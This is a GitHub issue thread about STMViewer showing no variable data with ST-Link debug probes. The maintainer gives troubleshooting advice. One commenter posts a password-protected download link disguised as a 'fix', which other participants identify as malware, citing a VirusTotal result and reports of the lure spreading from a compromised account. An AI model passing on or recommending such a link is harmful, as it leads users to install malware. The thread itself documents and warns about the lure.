klonyyy/MCUViewer #77: Unable to Display Variable Signals in STMViewer

NhutDang2002, 2024-08-26:
### Version/Branch:

Version 0.5.0

### Operating system:

Window 10

### Debug probe:

ST-Link V3

### Details:

**My Issue/Question:**

Please provide as much context as possible
Thank you for your attention.

I am currently exploring your STMViewer application. I have installed and tested it according to the instructions provided in the README file and also followed your YouTube video, but it is not working for me.

Initially, I tried using the NUCLEO-H503RB board, but it seems like it's not compatible with the application, as it kept showing the message "Stopped Target Not Found."

Next, I switched to the NUCLEO-H743ZI2 board, and I was able to get it running. However, when I imported the variables, no data was displayed. I tested this with both the example ELF file you provided and my own, but neither worked.

Could you please let me know what might be causing this issue?

Best regards!

### Screenshots/Video:

[image]
[image]

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

NhutDang2002, 2024-08-26:
I can't open that file; it shuts down immediately.

> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

klonyyy, 2024-08-26:
Hello, 
the problem you had with H5 is a known issue - #74. The H7 should work correctly - you should use only the *.elf file that was used for the compilation and was downloaded to your target - any other elf file will not work. Are you sure the file is correct and the variables are being changed in the code? STMViewer seems to work fine - its just either the elf file is not correct or you're not modyfing the variables in the code.

klonyyy, 2024-08-26:
Please for now do not download anything from @seeronline post, it seems like a spam or malware. @seeronline please explain more - whats under the link and how should it help?

sporniket, 2024-08-26:
> I can't open that file; it shuts down immediately.
> 
> > Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

@NhutDang2002 the program has most likely took control of your computer, you posted a comment just like the one from @seeronline  on one of my repository, replying on an issue I just created, the trigger word being "gcc" I guess.

I deleted that comment. An please perform an anti-virus/malware/... check on your computer.

flyinghead, 2024-08-26:
This is a malicious file. Don't download: https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a

NhutDang2002, 2024-08-26:
@sporniket Thank you for the reminder. I'm working on fixing this issue. I apologize for the inconvenience.